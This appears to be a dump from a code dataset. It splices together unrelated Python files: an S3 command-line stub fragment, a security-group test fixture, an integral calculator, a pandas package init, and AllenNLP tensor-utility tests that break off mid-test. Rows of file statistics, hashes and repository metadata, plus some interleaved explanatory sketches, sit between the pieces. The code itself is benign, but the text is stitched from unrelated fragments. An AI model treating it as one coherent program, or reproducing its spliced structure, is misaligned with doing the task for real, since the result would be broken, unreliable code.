fs3 = FakeS3Cmd(o.host, o.port)
handler = getattr(fs3, cmd)
handler(*args)
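The URI parsing used by FakeS3Cmd can be exercised on its own; this sketch repeats the same regular expression as `_parse_uri`:

```python
import re


def parse_s3_uri(path):
    # Same pattern as FakeS3Cmd._parse_uri above: the first group captures
    # the bucket, the second (optional) group captures the key, or None.
    match = re.match(r's3://([^/]+)(?:/(.*))?', path, re.I)
    return match.groups()


parse_s3_uri('s3://my-bucket/some/key.txt')  # -> ('my-bucket', 'some/key.txt')
parse_s3_uri('s3://my-bucket')               # -> ('my-bucket', None)
```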
| 30.284091 | 82 | 0.588743 | 334 | 2,665 | 4.550898 | 0.416168 | 0.042105 | 0.031579 | 0.025658 | 0.105263 | 0.105263 | 0.105263 | 0.086842 | 0.086842 | 0.086842 | 0 | 0.009469 | 0.286679 | 2,665 | 87 | 83 | 30.632184 | 0.79011 | 0.090807 | 0 | 0.142857 | 0 | 0 | 0.107616 | 0.009106 | 0 | 0 | 0 | 0.011494 | 0 | 0 | null | null | 0 | 0.095238 | null | null | 0.063492 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a2e3c368928b404fde473116276a9ed5cae8942 | 1,185 | py | Python | scripts/securitygroup/config.py | vkolli/contrail-test-perf | db04b8924a2c330baabe3059788b149d957a7d67 | [
"Apache-2.0"
] | 1 | 2017-06-13T04:42:34.000Z | 2017-06-13T04:42:34.000Z | scripts/securitygroup/config.py | vkolli/contrail-test-perf | db04b8924a2c330baabe3059788b149d957a7d67 | [
"Apache-2.0"
] | null | null | null | scripts/securitygroup/config.py | vkolli/contrail-test-perf | db04b8924a2c330baabe3059788b149d957a7d67 | [
"Apache-2.0"
] | null | null | null | import time
import paramiko
import fixtures
from fabric.api import run, hide, settings
from vn_test import VNFixture
from vm_test import VMFixture
from policy_test import PolicyFixture
from common.policy.config import ConfigPolicy
from common.connections import ContrailConnections
from security_group import SecurityGroupFixture
class ConfigSecGroup(ConfigPolicy):
def config_sec_group(self, name, secgrpid=None, entries=None):
secgrp_fixture = self.useFixture(SecurityGroupFixture(self.inputs,
self.connections, self.inputs.domain_name, self.inputs.project_name,
secgrp_name=name, uuid=secgrpid, secgrp_entries=entries))
result, msg = secgrp_fixture.verify_on_setup()
assert result, msg
return secgrp_fixture
def delete_sec_group(self, secgrp_fix):
secgrp_fix.cleanUp()
self.remove_from_cleanups(secgrp_fix)
def remove_from_cleanups(self, fix):
for cleanup in self._cleanups:
if fix.cleanUp in cleanup:
self._cleanups.remove(cleanup)
break
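The cleanup-removal pattern above, sketched without the fixture machinery (function and argument names are illustrative):

```python
def remove_from_cleanups(cleanups, target):
    # Mirrors ConfigSecGroup.remove_from_cleanups above: drop the first
    # registered cleanup entry that references `target`, then stop.
    for cleanup in cleanups:
        if target in cleanup:
            cleanups.remove(cleanup)
            break
    return cleanups
```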
| 34.852941 | 130 | 0.672574 | 132 | 1,185 | 5.840909 | 0.431818 | 0.038911 | 0.031128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27173 | 1,185 | 33 | 131 | 35.909091 | 0.893395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 1 | 0.115385 | false | 0 | 0.384615 | 0 | 0.576923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
8a340244538e5f22abe218a0a595984c86b99776 | 555 | py | Python | utils/integral_calculator.py | nomagiclab/balancing-ball | 28a2f95ee489cf7c1a2a3208412eda00e43835f3 | [
"MIT"
] | 4 | 2021-11-09T10:48:48.000Z | 2022-01-20T11:12:54.000Z | utils/integral_calculator.py | nomagiclab/balancing-ball | 28a2f95ee489cf7c1a2a3208412eda00e43835f3 | [
"MIT"
] | 16 | 2021-11-09T10:36:40.000Z | 2022-03-19T18:35:40.000Z | utils/integral_calculator.py | nomagiclab/balancing-ball | 28a2f95ee489cf7c1a2a3208412eda00e43835f3 | [
"MIT"
] | null | null | null | class IntegralCalculator:
def __init__(self):
self.value = 0
self.last_time = 0
def get_current_integral(self) -> float:
return self.value
def get_and_update_integral(self, new_x, new_time) -> float:
self.update_integral(new_x, new_time)
return self.get_current_integral()
def update_integral(self, new_x, new_time):
if self.last_time == 0:
self.last_time = new_time
dt = new_time - self.last_time
self.value += dt * new_x
self.last_time = new_time
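The accumulation rule above amounts to a right-endpoint rectangle rule (each interval's area uses the newest sample); a self-contained sketch with an illustrative class name:

```python
class RectangleIntegrator:
    # Minimal mirror of IntegralCalculator above: accumulates the integral
    # of x dt with a right-endpoint rectangle rule.
    def __init__(self):
        self.value = 0.0
        self.last_time = 0.0

    def update(self, new_x, new_time):
        if self.last_time == 0.0:
            self.last_time = new_time  # first sample: no elapsed interval yet
        dt = new_time - self.last_time
        self.value += dt * new_x
        self.last_time = new_time
        return self.value


integ = RectangleIntegrator()
integ.update(2.0, 1.0)  # first sample, dt == 0 -> value stays 0.0
integ.update(2.0, 2.0)  # dt == 1.0 -> value == 2.0
integ.update(4.0, 2.5)  # dt == 0.5 -> value == 4.0
```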
| 25.227273 | 64 | 0.632432 | 78 | 555 | 4.141026 | 0.25641 | 0.130031 | 0.185759 | 0.102167 | 0.297214 | 0.179567 | 0.179567 | 0 | 0 | 0 | 0 | 0.007519 | 0.281081 | 555 | 21 | 65 | 26.428571 | 0.802005 | 0 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0 | 0.066667 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a3486a4d71febd1848dbba2347c1a355f222185 | 217 | py | Python | crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py | 13rianlucero/CrabAgePrediction | 92bc7fbe1040f49e820473e33cc3902a5a7177c7 | [
"MIT"
] | 28,899 | 2016-10-13T03:32:12.000Z | 2022-03-31T21:39:05.000Z | crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py | 13rianlucero/CrabAgePrediction | 92bc7fbe1040f49e820473e33cc3902a5a7177c7 | [
"MIT"
] | 31,004 | 2016-10-12T23:22:27.000Z | 2022-03-31T23:17:38.000Z | crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py | 13rianlucero/CrabAgePrediction | 92bc7fbe1040f49e820473e33cc3902a5a7177c7 | [
"MIT"
] | 15,149 | 2016-10-13T03:21:31.000Z | 2022-03-31T18:46:47.000Z | from typing import TYPE_CHECKING
if TYPE_CHECKING:
# import modules that have public classes/functions
from pandas.io.formats import style
# and mark only those modules as public
__all__ = ["style"]
| 24.111111 | 55 | 0.737327 | 30 | 217 | 5.133333 | 0.733333 | 0.155844 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.211982 | 217 | 8 | 56 | 27.125 | 0.900585 | 0.400922 | 0 | 0 | 0 | 0 | 0.03937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
8a35d65e141b12d524977df842b606ea2f5482d6 | 71,598 | py | Python | allennlp/tests/nn/util_test.py | apmoore1/allennlp | bdb29a831ed68cb948b18b42fa61646b9ec11bf8 | [
"Apache-2.0"
] | null | null | null | allennlp/tests/nn/util_test.py | apmoore1/allennlp | bdb29a831ed68cb948b18b42fa61646b9ec11bf8 | [
"Apache-2.0"
] | null | null | null | allennlp/tests/nn/util_test.py | apmoore1/allennlp | bdb29a831ed68cb948b18b42fa61646b9ec11bf8 | [
"Apache-2.0"
] | 1 | 2020-02-19T11:34:32.000Z | 2020-02-19T11:34:32.000Z | import json
import random
from typing import NamedTuple, Any
import numpy
from numpy.testing import assert_array_almost_equal, assert_almost_equal
import torch
import pytest
from flaky import flaky
from allennlp.common.checks import ConfigurationError
from allennlp.common.testing import AllenNlpTestCase
from allennlp.common.util import sanitize
from allennlp.nn import util
from allennlp.models import load_archive
class TestNnUtil(AllenNlpTestCase):
def test_get_sequence_lengths_from_binary_mask(self):
binary_mask = torch.tensor(
[
[True, True, True, False, False, False],
[True, True, False, False, False, False],
[True, True, True, True, True, True],
[True, False, False, False, False, False],
]
)
lengths = util.get_lengths_from_binary_sequence_mask(binary_mask)
numpy.testing.assert_array_equal(lengths.numpy(), numpy.array([3, 2, 6, 1]))
def test_get_mask_from_sequence_lengths(self):
sequence_lengths = torch.LongTensor([4, 3, 1, 4, 2])
mask = util.get_mask_from_sequence_lengths(sequence_lengths, 5).data.numpy()
assert_almost_equal(
mask,
[[1, 1, 1, 1, 0], [1, 1, 1, 0, 0], [1, 0, 0, 0, 0], [1, 1, 1, 1, 0], [1, 1, 0, 0, 0]],
)
def test_get_sequence_lengths_converts_to_long_tensor_and_avoids_variable_overflow(self):
# Tests that the following weird behaviour in PyTorch 0.1.12
# doesn't happen for our sequence masks:
#
# mask = torch.ones([260]).bool()
# mask.sum() # equals 260.
# var_mask = t.a.V(mask)
# var_mask.sum() # equals 4, due to 8 bit precision - the sum overflows.
binary_mask = torch.ones(2, 260).bool()
lengths = util.get_lengths_from_binary_sequence_mask(binary_mask)
numpy.testing.assert_array_equal(lengths.data.numpy(), numpy.array([260, 260]))
def test_clamp_tensor(self):
# Test on uncoalesced sparse tensor
i = torch.LongTensor([[0, 1, 1, 0], [2, 0, 2, 2]])
v = torch.FloatTensor([3, 4, -5, 3])
tensor = torch.sparse.FloatTensor(i, v, torch.Size([2, 3]))
clamped_tensor = util.clamp_tensor(tensor, minimum=-3, maximum=3).to_dense()
assert_almost_equal(clamped_tensor, [[0, 0, 3], [3, 0, -3]])
# Test on coalesced sparse tensor
i = torch.LongTensor([[0, 1, 1], [2, 0, 2]])
v = torch.FloatTensor([3, 4, -5])
tensor = torch.sparse.FloatTensor(i, v, torch.Size([2, 3]))
clamped_tensor = util.clamp_tensor(tensor, minimum=-3, maximum=3).to_dense()
assert_almost_equal(clamped_tensor, [[0, 0, 3], [3, 0, -3]])
# Test on dense tensor
tensor = torch.tensor([[5, -4, 3], [-3, 0, -30]])
clamped_tensor = util.clamp_tensor(tensor, minimum=-3, maximum=3)
assert_almost_equal(clamped_tensor, [[3, -3, 3], [-3, 0, -3]])
def test_sort_tensor_by_length(self):
tensor = torch.rand([5, 7, 9])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 1:, :] = 0
tensor[3, 5:, :] = 0
sequence_lengths = torch.LongTensor([3, 4, 1, 5, 7])
sorted_tensor, sorted_lengths, reverse_indices, _ = util.sort_batch_by_length(
tensor, sequence_lengths
)
# Test sorted indices are padded correctly.
numpy.testing.assert_array_equal(sorted_tensor[1, 5:, :].data.numpy(), 0.0)
numpy.testing.assert_array_equal(sorted_tensor[2, 4:, :].data.numpy(), 0.0)
numpy.testing.assert_array_equal(sorted_tensor[3, 3:, :].data.numpy(), 0.0)
numpy.testing.assert_array_equal(sorted_tensor[4, 1:, :].data.numpy(), 0.0)
assert sorted_lengths.data.equal(torch.LongTensor([7, 5, 4, 3, 1]))
# Test restoration indices correctly recover the original tensor.
assert sorted_tensor.index_select(0, reverse_indices).data.equal(tensor.data)
def test_get_final_encoder_states(self):
encoder_outputs = torch.Tensor(
[
[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]],
]
)
mask = torch.tensor([[True, True, True], [True, True, False]])
final_states = util.get_final_encoder_states(encoder_outputs, mask, bidirectional=False)
assert_almost_equal(final_states.data.numpy(), [[9, 10, 11, 12], [17, 18, 19, 20]])
final_states = util.get_final_encoder_states(encoder_outputs, mask, bidirectional=True)
assert_almost_equal(final_states.data.numpy(), [[9, 10, 3, 4], [17, 18, 15, 16]])
def test_masked_softmax_no_mask(self):
# Testing the general unmasked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 3.0]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, None).data.numpy()
assert_array_almost_equal(
vector_1d_softmaxed, numpy.array([[0.090031, 0.244728, 0.665241]])
)
assert_almost_equal(1.0, numpy.sum(vector_1d_softmaxed), decimal=6)
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, None).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.017148, 0.046613, 0.93624]]))
# Testing the unmasked 1D case where the input is all 0s.
vector_zero = torch.FloatTensor([[0.0, 0.0, 0.0]])
vector_zero_softmaxed = util.masked_softmax(vector_zero, None).data.numpy()
assert_array_almost_equal(
vector_zero_softmaxed, numpy.array([[0.33333334, 0.33333334, 0.33333334]])
)
# Testing the general unmasked batched case.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]])
masked_matrix_softmaxed = util.masked_softmax(matrix, None).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array(
[[0.01714783, 0.04661262, 0.93623955], [0.09003057, 0.24472847, 0.66524096]]
),
)
# Testing the unmasked batched case where one of the inputs are all 0s.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [0.0, 0.0, 0.0]])
masked_matrix_softmaxed = util.masked_softmax(matrix, None).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array(
[[0.01714783, 0.04661262, 0.93623955], [0.33333334, 0.33333334, 0.33333334]]
),
)
def test_masked_softmax_masked(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
mask_1d = torch.tensor([[True, False, True]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.01798621, 0.0, 0.98201382]]))
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[True, False, True, True]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
vector_1d_softmaxed, numpy.array([[0.01321289, 0.0, 0.26538793, 0.72139918]])
)
# Testing the masked 1D case where the input is all 0s and the mask
# is not all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, True]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0, 0, 0, 1]]))
# Testing the masked 1D case where the input is not all 0s
# and the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.0, 0.0, 0.0, 0.0]]))
# Testing the masked 1D case where the input is all 0s and
# the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.0, 0.0, 0.0, 0.0]]))
# Testing the masked 1D case where there are large elements in the
# padding.
vector_1d = torch.FloatTensor([[1.0, 1.0, 1e5]])
mask_1d = torch.tensor([[True, True, False]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.5, 0.5, 0]]))
# Testing the general masked batched case.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.01798621, 0.0, 0.98201382], [0.090031, 0.244728, 0.665241]]),
)
# Testing the masked batch case where one of the inputs is all 0s but
# none of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.5, 0.0, 0.5], [0.090031, 0.244728, 0.665241]])
)
# Testing the masked batch case where one of the inputs is all 0s and
# one of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [False, False, False]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.5, 0.0, 0.5], [0.0, 0.0, 0.0]])
)
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[False, False, False], [True, False, True]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.0, 0.0, 0.0], [0.11920292, 0.0, 0.88079708]])
)
def test_masked_softmax_memory_efficient_masked(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
mask_1d = torch.tensor([[True, False, True]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.01798621, 0.0, 0.98201382]]))
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[True, False, True, True]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
vector_1d_softmaxed, numpy.array([[0.01321289, 0.0, 0.26538793, 0.72139918]])
)
# Testing the masked 1D case where the input is all 0s and the mask
# is not all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, True]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0, 0, 0, 1]]))
# Testing the masked 1D case where the input is not all 0s
# and the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.25, 0.25, 0.25, 0.25]]))
# Testing the masked 1D case where the input is all 0s and
# the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.25, 0.25, 0.25, 0.25]]))
# Testing the masked 1D case where there are large elements in the
# padding.
vector_1d = torch.FloatTensor([[1.0, 1.0, 1e5]])
mask_1d = torch.tensor([[True, True, False]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.5, 0.5, 0]]))
# Testing the general masked batched case.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.01798621, 0.0, 0.98201382], [0.090031, 0.244728, 0.665241]]),
)
# Testing the masked batch case where one of the inputs is all 0s but
# none of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.5, 0.0, 0.5], [0.090031, 0.244728, 0.665241]])
)
# Testing the masked batch case where one of the inputs is all 0s and
# one of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [False, False, False]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.5, 0.0, 0.5], [0.33333333, 0.33333333, 0.33333333]]),
)
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[False, False, False], [True, False, True]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.33333333, 0.33333333, 0.33333333], [0.11920292, 0.0, 0.88079708]]),
)
def test_masked_log_softmax_masked(self):
# Tests replicated from test_masked_softmax_masked - we exponentiate the log
# softmax and check it contains the correct elements (masked elements should be ~0).
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
mask_1d = torch.tensor([[True, False, True]])
vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
numpy.exp(vector_1d_softmaxed), numpy.array([[0.01798621, 0.0, 0.98201382]])
)
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[True, False, True, True]])
vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
numpy.exp(vector_1d_softmaxed), numpy.array([[0.01321289, 0.0, 0.26538793, 0.72139918]])
)
# Testing the masked 1D case where the input is all 0s and the mask
# is not all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, True]])
vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
numpy.exp(vector_1d_softmaxed), numpy.array([[0.0, 0.0, 0.0, 1.0]])
)
# Testing the masked 1D case where the input is not all 0s
# and the mask is all 0s. The output here will be arbitrary, but it should not be nan.
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert not numpy.isnan(vector_1d_softmaxed).any()
def test_masked_max(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([True, False, True])
vector_1d_maxed = util.masked_max(vector_1d, mask_1d, dim=0).data.numpy()
assert_array_almost_equal(vector_1d_maxed, 5.0)
# Testing if all masks are zero, the output will be arbitrary, but it should not be nan.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([False, False, False])
vector_1d_maxed = util.masked_max(vector_1d, mask_1d, dim=0).data.numpy()
assert not numpy.isnan(vector_1d_maxed).any()
# Testing batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_maxed = util.masked_max(matrix, mask, dim=-1).data.numpy()
assert_array_almost_equal(matrix_maxed, numpy.array([5.0, -1.0]))
# Testing keepdim for batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_maxed = util.masked_max(matrix, mask, dim=-1, keepdim=True).data.numpy()
assert_array_almost_equal(matrix_maxed, numpy.array([[5.0], [-1.0]]))
# Testing broadcast
matrix = torch.FloatTensor(
[[[1.0, 2.0], [12.0, 3.0], [5.0, -1.0]], [[-1.0, -3.0], [-2.0, -0.5], [3.0, 8.0]]]
)
mask = torch.tensor([[True, False, True], [True, True, False]]).unsqueeze(-1)
matrix_maxed = util.masked_max(matrix, mask, dim=1).data.numpy()
assert_array_almost_equal(matrix_maxed, numpy.array([[5.0, 2.0], [-1.0, -0.5]]))
def test_masked_mean(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([True, False, True])
vector_1d_mean = util.masked_mean(vector_1d, mask_1d, dim=0).data.numpy()
assert_array_almost_equal(vector_1d_mean, 3.0)
# Testing if all masks are zero, the output will be arbitrary, but it should not be nan.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([False, False, False])
vector_1d_mean = util.masked_mean(vector_1d, mask_1d, dim=0).data.numpy()
assert not numpy.isnan(vector_1d_mean).any()
# Testing batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_mean = util.masked_mean(matrix, mask, dim=-1).data.numpy()
assert_array_almost_equal(matrix_mean, numpy.array([3.0, -1.5]))
# Testing keepdim for batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_mean = util.masked_mean(matrix, mask, dim=-1, keepdim=True).data.numpy()
assert_array_almost_equal(matrix_mean, numpy.array([[3.0], [-1.5]]))
# Testing broadcast
matrix = torch.FloatTensor(
[[[1.0, 2.0], [12.0, 3.0], [5.0, -1.0]], [[-1.0, -3.0], [-2.0, -0.5], [3.0, 8.0]]]
)
mask = torch.tensor([[True, False, True], [True, True, False]]).unsqueeze(-1)
matrix_mean = util.masked_mean(matrix, mask, dim=1).data.numpy()
assert_array_almost_equal(matrix_mean, numpy.array([[3.0, 0.5], [-1.5, -1.75]]))
def test_masked_flip(self):
tensor = torch.FloatTensor(
[[[6, 6, 6], [1, 1, 1], [2, 2, 2]], [[3, 3, 3], [4, 4, 4], [5, 5, 5]]]
)
solution = [[[6, 6, 6], [0, 0, 0]], [[4, 4, 4], [3, 3, 3]]]
response = util.masked_flip(tensor, [1, 2])
assert_almost_equal(response, solution)
tensor = torch.FloatTensor(
[
[[6, 6, 6], [1, 1, 1], [2, 2, 2], [0, 0, 0]],
[[3, 3, 3], [4, 4, 4], [5, 5, 5], [1, 2, 3]],
]
)
solution = [
[[2, 2, 2], [1, 1, 1], [6, 6, 6], [0, 0, 0]],
[[1, 2, 3], [5, 5, 5], [4, 4, 4], [3, 3, 3]],
]
response = util.masked_flip(tensor, [3, 4])
assert_almost_equal(response, solution)
tensor = torch.FloatTensor(
[
[[6, 6, 6], [1, 1, 1], [2, 2, 2], [0, 0, 0]],
[[3, 3, 3], [4, 4, 4], [5, 5, 5], [1, 2, 3]],
[[1, 1, 1], [2, 2, 2], [0, 0, 0], [0, 0, 0]],
]
)
solution = [
[[2, 2, 2], [1, 1, 1], [6, 6, 6], [0, 0, 0]],
[[1, 2, 3], [5, 5, 5], [4, 4, 4], [3, 3, 3]],
[[2, 2, 2], [1, 1, 1], [0, 0, 0], [0, 0, 0]],
]
response = util.masked_flip(tensor, [3, 4, 2])
assert_almost_equal(response, solution)
def test_get_text_field_mask_returns_a_correct_mask(self):
text_field_tensors = {
"indexer_name": {
"tokens": torch.LongTensor([[3, 4, 5, 0, 0], [1, 2, 0, 0, 0]]),
"token_characters": torch.LongTensor(
[
[[1, 2], [3, 0], [2, 0], [0, 0], [0, 0]],
[[5, 0], [4, 6], [0, 0], [0, 0], [0, 0]],
]
),
}
}
assert_almost_equal(
util.get_text_field_mask(text_field_tensors).long().numpy(),
[[1, 1, 1, 0, 0], [1, 1, 0, 0, 0]],
)
def test_get_text_field_mask_returns_a_correct_mask_character_only_input(self):
text_field_tensors = {
"indexer_name": {
"token_characters": torch.LongTensor(
[
[[1, 2, 3], [3, 0, 1], [2, 1, 0], [0, 0, 0]],
[[5, 5, 5], [4, 6, 0], [0, 0, 0], [0, 0, 0]],
]
)
}
}
assert_almost_equal(
util.get_text_field_mask(text_field_tensors).long().numpy(),
[[1, 1, 1, 0], [1, 1, 0, 0]],
)
def test_get_text_field_mask_returns_a_correct_mask_list_field(self):
text_field_tensors = {
"indexer_name": {
"list_tokens": torch.LongTensor(
[
[[1, 2], [3, 0], [2, 0], [0, 0], [0, 0]],
[[5, 0], [4, 6], [0, 0], [0, 0], [0, 0]],
]
)
}
}
actual_mask = (
util.get_text_field_mask(text_field_tensors, num_wrapping_dims=1).long().numpy()
)
